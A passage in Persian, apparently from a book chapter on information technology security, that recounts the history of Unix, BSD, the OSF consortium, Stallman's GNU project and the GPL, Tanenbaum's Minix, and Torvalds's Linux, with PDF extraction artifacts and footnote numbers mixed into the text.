ﺍﺑﺪﺍﻉ ﻛﺮﺩﻩﺑﻮﺩ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻛﺮﺩ .ﺯﺑﺎﻥ Cﻃﻮﺭﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﻳﻚ ﺯﺑﺎﻥ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﻲ ﺳﺎﺩﻩ ﻭ ﺟﺎﺑﺠﺎﻳﻲﭘـﺬﻳﺮ ﺑﺎﺷـﺪ .ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺑﻪ ﺯﺑﺎﻥ Cﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺑﻪ ﺳﺎﺩﮔﻲ ﺍﺯ ﻳﻚ ﻧـﻮﻉ ﺭﺍﻳﺎﻧـﻪ ﺑـﻪ ﻧـﻮﻉ ﺩﻳﮕـﺮ ﻣﻨﺘﻘـﻞ ﺷـﻮﻧﺪ ،ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﺍﻳﻨﻜـﺎﺭ ﺩﺭ ﺯﺑﺎﻧﻬـﺎﻱ
2 Logs
3 Desktop Unix
4 Multilevel Security
5 Tools
6 American Telephone & Telegraph
7 Thompson
8 Ritchie
٢٥٩ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺳﻄﺢ ﺑﺎﻻ ﻣﺜﻞ Fortranﺍﻧﺠﺎﻡﭘﺬﻳﺮ ﺑﻮﺩ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺎ ﺳﺮﻋﺖ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﺯﺑﺎﻥ ﺑـﻮﻣﻲ
ﻣﺎﺷﻴﻦ ﻛﺪﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ ﺍﺟﺮﺍ ﻣﻲﺷﺪﻧﺪ .ﺗﺎ ﺳﺎﻝ ۱۹۷۷ﺑﻴﺶ ﺍﺯ ۵۰۰ﺍﺩﺍﺭﻩ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ؛ ۱۲۵ﺍﺩﺍﺭﻩ ﻋﺒﺎﺭﺕ
ﺑﻮﺩﻧﺪ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺑﻴﺶ ﺍﺯ ۱۰ﻛﺸﻮﺭ ﺧﺎﺭﺟﻲ ﺩﻳﮕﺮ.
ﺗﻮﺳﻌﻪ ﺩﺭ ﻧﻘﺎﻁ ﻣﺨﺘﻠﻔﻲ ﺍﺩﺍﻣﻪ ﻳﺎﻓﺖ؛ ﺍﺯ ﺟﻤﻠﻪ ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﻟﻴﻔﺮﻧﻴﺎ ﺩﺭ ﺑﺮﻛﻠﻲ ،ﻛـﻪ ﮔـﺴﺘﺮﺵ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺑﺮﻛﻠـﻲ ) - ٩(BSDﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ
ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﺳﻴﺴﺘﻢ - Unixﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ .ﺩﺭ ۶ﺳﺎﻝ ﺑﻌﺪﻱ ،ﺩﺭ ﻓﻌﺎﻟﻴﺘﻲ ﻛﻪ ﺗﻮﺳﻂ ARPAﺭﻭﻱ ﺁﻥ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﺷـﺪ،
ﺁﻧﭽﻪ ﺗﺎ ﺁﻧﺰﻣﺎﻥ BSD Unixﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﺪ ﺗﺎ ﺣﺪ ﻭ ﺍﻧﺪﺍﺯﻩﻫﺎﻱ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺴﺘﻘﻞ ﺭﺷﺪ ﻛﺮﺩ ﻭ ﺑﺎﻋﺚ ﺍﺻﻼﺣﺎﺕ ﭼـﺸﻤﮕﻴﺮﻱ ﺩﺭ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ AT&Tﺷﺪ .ﺷﺎﻳﺪ ﻣﻬﻤﺘﺮﻳﻦ ﺍﺻﻼﺣﺎﺕ ﺑﺮﻛﻠﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺷﺒﻜﻪ ﺑﻮﺩ ،ﻛﻪ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ Unixﺭﺍ ﺑﻪ ﺷﺒﻜﻪﻫـﺎﻱ ﻣﺤﻠـﻲ
)LANﻫﺎ( ١٠ﺁﺳﺎﻥ ﻣﻲﻛﺮﺩ .ﺑﻪ ﻫﻤﻪ ﺍﻳﻦ ﺩﻻﻳﻞ Unix ،ﻧﺴﺨﺔ ﺑﺮﻛﻠﻲ ﺩﺭ ﺟﻮﺍﻣ ﹺﻊ ﺗﺤﻘﻴﻘﺎﺗﻲ ﻭ ﻋﻠﻤﻲ ﺭﻭﺍﺝ ﺑﺴﻴﺎﺭ ﭘﻴﺪﺍ ﻛﺮﺩ.
ﺩﺭ ﺍﻭﺍﺧﺮ ﺳﺎﻟﻬﺎﻱ ۱۹۸۰ﺯﻣﺎﻧﻴﻜﻪ Unixﺍﺯ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻓﻨﻲ ﺑـﻪ ﺑﺎﺯﺍﺭﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺭﺍﻩ ﭘﻴـﺪﺍ ﻛـﺮﺩ ،ﻧﺎﺳـﺎﺯﮔﺎﺭﻳﻬﺎﻱ ﻣﻴـﺎﻥ ﻧـﺴﺨﻪﻫـﺎﻱ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ AT&T Unixﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺒﺘﻨﻲ ﺑﺮ BSD Unixﺷﺮﻭﻉ ﺑﻪ ﺍﻳﺠﺎﺩ ﻣﺸﻜﻼﺕ ﺑﺮﺍﻱ ﻫﻤﺔ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﻤﻮﺩ .ﻣﺸﺘﺮﻳﺎﻥ
ﺗﺠﺎﺭﻱ ﺧﻮﺍﻫﺎﻥ ﻳﻚ ﻧﺴﺨﻪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ Unixﺑﻮﺩﻧﺪ ،ﺑﻪ ﺍﻳﻦ ﺍﻣﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺁﻣـﻮﺯﺵ ﺭﺍ ﻛـﺎﻫﺶ ﺩﻫﻨـﺪ ﻭ ﻗﺎﺑﻠﻴـﺖ ﺟﺎﺑﺠـﺎﻳﻲ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺳﺎﺧﺘﻪﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻓﺮﻭﺷﻨﺪﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨﻨﺪ .ﻫﻤﭽﻨـﻴﻦ ﺑـﺎﺯﺍﺭ ﻧﻮﻇﻬـﻮﺭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ
Unixﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻲﻃﻠﺒﻴﺪ ،ﭼﻮﻥ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﺎﻭﺭ ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﭘﺸﺘﻴﺒﺎﻧ ﹺ
ﻲ ﺑﺴﺘﺮﻫﺎﻱ ﭼﻨﺪﮔﺎﻧﻪ ﺭﺍ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺳﺎﺩﻩﺗـﺮ ﻣـﻲﻛﻨـﺪ ﻭ
ﻫﻤﭽﻨﻴﻦ ﺑﺎ ﺑﺎﺯﺍﺭ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺭﻗﺎﺑﺖ ﻣﻲﻧﻤﺎﻳﺪ.
ﺩﺭ ﻣﺎﻩ ﻣﻲ ،۱۹۸۸ﻫﻔﺖ ﺷﺮﻛﺖ ﭘﻴﺸﺮﻭ ﺩﺭ ﺻﻨﻌﺖ - Unixﺭﺍﻳﺎﻧﻪ ﺁﭘﻮﻟﻮ ،١١ﺷﺮﻛﺖ ﺗﺠﻬﻴﺰﺍﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ،١٢ﻫﻴﻮﻟﺖ ﭘﺎﻛﺎﺭﺩ )،IBM ،١٣(HP
١٤
ﻭ ﺳﻪ ﺷﺮﻛﺖ ﺍﺻﻠﻲ ﺍﺭﻭﭘﺎﻳﻲ ﺳﺎﺯﻧﺪﻩ ﻛﺎﻣﭙﻴﻮﺗﺮ -ﺗﺸﻜﻴﻞ ﺑﻨﻴﺎﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺎﺯ ) (OSFﺭﺍ ﺍﻋﻼﻡ ﻛﺮﺩﻧﺪ .ﻫﺪﻑ OSFﺑﻴـﺮﻭﻥ ﺁﻭﺭﺩﻥ Unix
ﺍﺯ ﻛﻨﺘﺮﻝ AT&Tﻭ ﻗﺮﺍﺭﺩﺍﺩﻥ ﺁﻥ ﺩﺭ ﺩﺳﺘﺎﻥ ﻳﻚ ﺍﺋﺘﻼﻑ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺻﻨﻌﺘﻲ ﺑﻮﺩ ،ﻛﻪ ﺑﺎ ﻫﺪﺍﻳﺖ ﺗﻮﺳﻌﺔ Unixﺩﺭ ﺁﻳﻨـﺪﻩ ﻭ ﺩﺭ ﺩﺳـﺘﺮﺱ
ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺁﻥ ﺑﺮﺍﻱ ﻋﻤﻮﻡ -ﺗﺤﺖ ﻳﻚ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ﻭﺍﺣـﺪ -ﺭﻫﺒـﺮﻱ ﻣـﻲﺷـﺪ OSF .ﺗـﺼﻤﻴﻢ ﮔﺮﻓـﺖ ﭘﺎﻳـﺔ Unixﺧـﻮﺩ ﺭﺍ ﺑﺮﺍﺳـﺎﺱ
١٦ ١٥
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ IBMﻗﺮﺍﺭ ﺩﻫﺪ ،ﭘﺲ ﺑﻪ ﺳﻤﺖ ﻫﺴﺘﺔ Unixﻣﺎﺥ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﺭﻧﻲ ﻣﻠﻮﻥ ،ﻛﻪ ﺁﻣﻴﺰﻩﺍﻱ ﺍﺯ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎ ﻭ ﺗﺴﻬﻴﻼﺕ HP
ﻭ IBMﻭ ﺷﺮﻛﺖ ﺗﺠﻬﻴﺰﺍﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻮﺩ ﺣﺮﻛﺖ ﻛﺮﺩ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻧﺘﻴﺠﺔ ﺍﻳﻦ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻣﻮﺭﺩ ﭘﺬﻳﺮﺵ ﻭ ﺍﺳﺘﻘﺒﺎﻝ ﮔﺴﺘﺮﺩﻩ ﻭﺍﻗـﻊ ﻧـﺸﺪ،
OSFﺑﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺑﻴﺸﺘﺮ ﺗﻮﺳﻌﻪﺍﻱ ﺍﺩﺍﻣﻪ ﺩﺍﺩ.
GNU
ﺭﻳﭽﺎﺭﺩ ﺍﺳﺘﺎﻟﻤﻦ ١٧ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﭘﺮﻭﮊﻩ LISPﺩﺭ ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ﻫﻮﺵ ﻣﺼﻨﻮﻋﻲ ﺩﺍﻧﺸﮕﺎﻩ ﻭﻗﺘـﻲ ﺩﻳـﺪ ﺷـﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺑـﻪ ﺍﺳـﺘﻔﺎﺩﻩ
ﺭﺳﺎﻧﺪﻥ ﺗﺤﻘﻴﻘﺎﺕ ﺗﺄﺳﻴﺲ ﺷﺪﻩﺑﻮﺩﻧﺪ ﻗﻮﺍﻧﻴﻨﻲ ﺭﺍ ﭘﺬﻳﺮﻓﺘﻨﺪ ﻛﻪ ﻣﺎﻧﻊ ﺑﻪ ﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﺭﺍﻳﮕﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﻮﺩ ﺑﺴﻴﺎﺭ ﻧﺎﺭﺍﺣـﺖ ﺷـﺪ .ﺍﺳـﺘﺎﻟﻤﻦ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻣﺘﻮﺟﻪ ﺷﺪ ﻛﻪ ﺍﮔﺮ ﺑﺨﻮﺍﻫﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﻣﻴﺎﻥ ﮔﺮﻭﻩ ﺑﺰﺭﮔﻲ ﺍﺯ ﻣﺮﺩﻡ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﺩ ،ﻧﻤﻲﺗﻮﺍﻧﺪ ﺍﺳـﺎﺱ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﺮ ﺳـﺨﺖﺍﻓـﺰﺍﺭ
ﺧﺎﺻﻲ ﻛﻪ ﺗﻨﻬﺎ ﺗﻮﺳﻂ ﺗﻌﺪﺍﺩ ﻛﻤﻲ ﺍﺯ ﻛﺎﺭﺧﺎﻧﻪﻫﺎﻱ ﺳﺎﺯﻧﺪﻩ ﺳﺎﺧﺘﻪ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﻭ ﺗﻨﻬﺎ LIPSﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﺮﺩﻧﺪ ﭘﺎﻳﻪﮔـﺬﺍﺭﻱ ﻛﻨـﺪ .ﻟـﺬﺍ ﺑـﻪ
ﺟﺎﻱ ﺍﻳﻨﻜﺎﺭ ﺍﻭ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺖ ﺍﻧﺠﻤﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺟﺪﻳﺪﻱ ﺭﺍ ﺑﺮﺍﺳﺎﺱ ،Unixﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻗﺪﺭﺗﻤﻨﺪ ﻛﻪ ﻣﺸﺎﺑﻪ ﺳﻴﺴﺘﻢ ﻗﺒﻠـﻲ ﻭ ﻧﻴـﺰ
ﺁﻳﻨﺪﻩﺩﺍﺭ ﺑﻮﺩ ﭘﺎﻳﻪﺭﻳﺰﻱ ﻛﻨﺪ .ﺍﻭ ﻃﺮﺡ ﺧﻮﺩ ﺭﺍ GNUﻧﺎﻣﻴﺪ؛ ﻳﻚ ﻣﺨﻔﻒ ﺑﺎﺯﮔﺸﺘﻲ ﺍﺯ ﻋﺒﺎﺭﺕ " Unix GNUﻧﻴـﺴﺖ"! ١٨ﺍﺯ ﻧﻈـﺮ ﺍﺳـﺘﺎﻟﻤﻦ
ﺭﺍﻳﮕﺎﻥ ﺑﻮﺩﻥ ﺗﻨﻬﺎ ﻣﻌﻴﺎﺭ ﻫﺰﻳﻨﻪ ﻧﺒﻮﺩ ،ﺑﻠﻜﻪ ﻳﻚ ﻣﻌﻴﺎﺭ ﺁﺯﺍﺩﻱ ﻫﻢ ﺑﻮﺩ .ﺁﺯﺍﺩ ﺑﻮﺩﻥ ﺑﻪ ﺍﻳﻦ ﻣﻔﻬﻮﻡ ﺑﻮﺩ ﻛﻪ ﺍﻭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺖ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ
ﺑﺎﺯﺑﻴﻨﻲ ﻛﻨﺪ ﻭ ﺩﺭ ﺁﻥ ﺍﻋﻤﺎﻝ ﺗﻐﻴﻴﺮﺍﺕ ﻧﻤﺎﻳﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺁﺯﺍﺩ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﻣﻴﺎﻥ ﺩﻭﺳﺘﺎﻧﺶ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕـﺬﺍﺭﺩ.
ﺍﻭ ﺁﺯﺍﺩﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺁﻧﮕﻮﻧﻪ ﻣﻲﺧﻮﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﺯﺍﺩﻱ ﺑﻴﺎﻥ ﻣﻄﺮﺡ ﺍﺳﺖ ،ﻧﻪ ﺩﺭ ﺁﺯﺍﺩﻱ ﻣﺸﺮﻭﺑﺎﺕ ﺍﻟﻜﻠﻲ .ﺗﺎ ﺳـﺎﻝ ۱۹۸۵ﺍﻭﻟـﻴﻦ ﻣﺤـﺼﻮﻝ
ﻋﻤﺪﺓ - GNUﻭﻳﺮﺍﻳﺸﮕﺮ ﻣﺘﻦ - Emacsﺑﻪ ﻧﻘﻄﻪﺍﻱ ﺍﺯ ﺭﺷﺪ ﺭﺳﻴﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺩﻳﮕـﺮﻱ ﻏﻴـﺮ ﺍﺯ ﺍﺳـﺘﺎﻟﻤﻦ ﻫـﻢ ﺑـﻪ
ﺭﺍﺣﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ .ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﺎﻟﻤﻦ ﻛﺎﺭ ﺭﻭﻱ ﻳﻚ ﻛﺎﻣﭙﺎﻳﻠﺮ ﺁﺯﺍﺩ Cﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩ؛ .GNU Cﻫﺮﺩﻭﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﺤﺖ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ
ﻋﻤﻮﻣﻲ ١٩(GPL) GNUﺍﺳﺘﺎﻟﻤﻦ ﺗﻮﺯﻳﻊ ﺷﺪﻧﺪ .ﺍﻳﻦ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ،ﺑﻪ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺣﻖ ﺍﻧﺘﺸﺎﺭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﺍﻋﻤﺎﻝ ﺗﻐﻴﻴﺮﺍﺕ ﺷﺨﺼﻲ ﺭﺍ
ﻣﻲﺩﺍﺩ ،ﻣﺸﺮﻭﻁ ﺑﺮ ﺁﻧﻜﻪ ﻫﻤﺔ ﺗﻐﻴﻴﺮﺍﺕ ﺁﺗﻲ ﺩﺭ ﺑﺮﻧﺎﻣﻪ ،ﺗﺤﺖ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﻫﻤﺎﻥ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻗﺒﻠﻲ ﻣﻨﺘﺸﺮ ﺷـﻮﻧﺪ .ﻫﻤـﺎﻥ ﺳـﺎﻝ ﺍﺳـﺘﺎﻟﻤﻦ
ﺑﻨﻴﺎﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ ٢٠ﺭﺍ ﺗﺄﺳﻴﺲ ﻛﺮﺩ؛ ﺑﻨﻴﺎﺩﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻛﻪ ﻫﺪﺍﻳﺎﻱ ﻣﺮﺩﻣﻲ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﻛﺮﺩ ﻭ ﺑﺮﺍﻱ ﺍﺳﺘﺨﺪﺍﻡ ﺑﺮﻧﺎﻣﻪﻧﻮﻳـﺴﺎﻧﻲ ﻛـﻪ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺍﻧﺘﺸﺎﺭ ﻣﺠﺪﺩ ﻣﻲﻧﻮﺷﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﻮﺩ.
Unixﻭ Minix
ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﻫﻤﺎﻥ ﺯﻣﺎﻧﻲ ﻛﻪ ﺍﺳﺘﺎﻟﻤﻦ ﭘﺮﻭﮊﺓ GNUﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩ ،ﭘﺮﻭﻓﺴﻮﺭ ﺍﻧﺪﺭﻭ ﺍﺱ .ﺗﺎﻧﻨﺒﺎﻡ ٢١ﺗﺼﻤﻴﻢ ﮔﺮﻓـﺖ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺧـﻮﺩﺵ ﺍﺯ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Unixﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﺪﺭﻳﺲ ﻭ ﺗﺤﻘﻴﻖ ﭘﺪﻳﺪ ﺁﻭﺭﺩ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﺍﺑﺘﺪﺍ ﻧﻮﺷﺘﻪ ﻣﻲﺷﺪ ﺍﻭ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺁﺯﺍﺩﺍﻧﻪ
ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺩﺭ ﻛﺘﺎﺏ ﺩﺭﺳﻲ ﺧﻮﺩ ﻣﻨﺘﺸﺮ ﻭ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻋﻤﻠﻴﺎﺗﻲ ﺭﺍ ﺗﻮﺯﻳﻊ ﻛﻨﺪ ،ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺣﻖ ﺍﻣﺘﻴـﺎﺯﻱ ﺑـﻪ AT&Tﭘﺮﺩﺍﺧـﺖ
ﻧﻤﺎﻳﺪ .ﺍﻳﻦ ﺳﻴﺴﺘﻢ ،Minix ،ﺑﺮ ﺍﺳﺎﺱ ﻧﻤﻮﻧﻪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ IBM PC ATﻋﻤﻞ ﻣﻲﻛﺮﺩ ﻭ ﺑﻪ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ ﻣﺒﺘﻨـﻲ
ﺑﺮ Intelﻣﺠﻬﺰ ﺑﻮﺩ .ﺍﻳﻦ ﻃﺮﺡ ﻣﻨﺠﺮ ﺑﻪ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﻳﻚ ﺑﺴﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﭘﺎﻳﺪﺍﺭ ﻭ ﻣﺴﺘﻨﺪﺳﺎﺯﻱﺷﺪﻩ ﻭ ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﻛﺘﺎﺏ ﺩﺭﺳﻲ ﻋـﺎﻟﻲ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺷﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ "ﻛﺎﺭﺁﻣﺪﻱ" ﺩﺭ ﻃﺮﺍﺣﻲ Minixﻳﻚ ﻣﻌﻴﺎﺭ ﺍﺳﺎﺳﻲ ﻧﺒﻮﺩ ،ﻭ ﺍﻳﻦ ﺍﻣﺮ ﺩﺭ ﻛﻨﺎﺭ ﻣﺴﺎﺋﻞ ﺭﻋﺎﻳﺖ ﺣﻖ ﻛﭙـﻲ ﻣﺮﺑـﻮﻁ
ﺑﻪ ﻛﺘﺎﺏ ﺩﺭﺳﻲ ﺑﺎﻋﺚ ﺷﺪ Minixﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺭﻭﺯﻣﺮﻩ ﺩﺭ ﮔﺴﺘﺮﺓ ﻭﺳﻴﻊ ،ﮔﺰﻳﻨﺔ ﺧﻮﺑﻲ ﺍﺯ ﺁﺏ ﺩﺭﻧﻴﺎﻳﺪ.
ﺩﺭ ﺳﺎﻝ ۱۹۹۱ﻳﻚ ﺩﺍﻧﺸﺠﻮﻱ ﻋﻠﻮﻡ ﺭﺍﻳﺎﻧﺔ ﻓﻨﻼﻧﺪﻱ ﺑﻪ ﻧﺎﻡ ﻟﻴﻨﻮﺱ ﺗﺮﻭﺍﻟﺪﺯ ٢٢ﺗﺼﻤﻴﻢ ﮔﺮﻓﺖ ﻳﻚ ﻧﺴﺨﺔ ﺁﺯﺍﺩ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ Unixﻛـﻪ
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺭﻭﺯﻣﺮﻩ ﻣﻨﺎﺳﺒﺘﺮ ﺑﺎﺷﺪ ﭘﺪﻳﺪ ﺁﻭﺭﺩ .ﺗﺮﻭﺍﻟﺪﺯ ﺑﺎ ﺷﺮﻭﻉ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ،Minixﮔﺎﻡ ﺑﻪ ﮔﺎﻡ ﻫﺴﺘﺔ ﻣﺮﻛﺰﻱ ﻭ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ ﺩﻭﺑـﺎﺭﻩ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩ ﺗﺎ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩ ﻛﻪ ﻫﻴﭽﻴﻚ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺻﻠﻲ ﺗﺎﻧﻨﺒﺎﻡ ﺩﺭ ﺁﻥ ﻧﺒﻮﺩ .ﺗﺮﻭﺍﻟﺪﺯ ﺳﻴﺴﺘﻢ ﺑﺪﺳﺖ ﺁﻣـﺪﻩ
ﺭﺍ " "Linuxﻧﺎﻣﻴﺪ ﻭ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺖ ﺁﻧﺮﺍ ﺗﺤﺖ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ GPLﺍﺳﺘﺎﻟﻤﻦ ﺗﻮﺯﻳﻊ ﻛﻨﺪ .ﺗﺮﻭﺍﻟﺪﺯ ﺑﺎ ﺗﺮﻛﻴﺐ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑـﺎ ﺳـﺎﻳﺮ ﺍﺑﺰﺍﺭﻫـﺎﻱ
ﺭﺍﻳﮕﺎﻥ ﻣﻮﺟﻮﺩ ﺧﺼﻮﺻﹰﺎ ﻛﺎﻣﭙﺎﻳﻠﺮ Cﻭ ﻭﻳﺮﺍﻳﺸﮕﺮ ﻣﺘﻦ GNUﺑﻨﻴﺎﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Windowsﻛﻨﺴﺮﺳﻴﻮﻡ ،Xﺗﻮﺍﻧـﺴﺖ
ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻛﺎﻣﻞ ﻭ ﻋﻤﻠﻴﺎﺗﻲ ﺍﻳﺠﺎﺩ ﻛﻨﺪ .ﻛﺎﺭ ﺭﻭﻱ Linuxﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺗﻮﺳﻂ ﺻﺪﻫﺎ ﻛﻤﻚﻛﻨﻨﺪﻩ ﻫﻤﭽﻨﺎﻥ ﺍﺩﺍﻣﻪ ﺩﺍﺭﺩ.
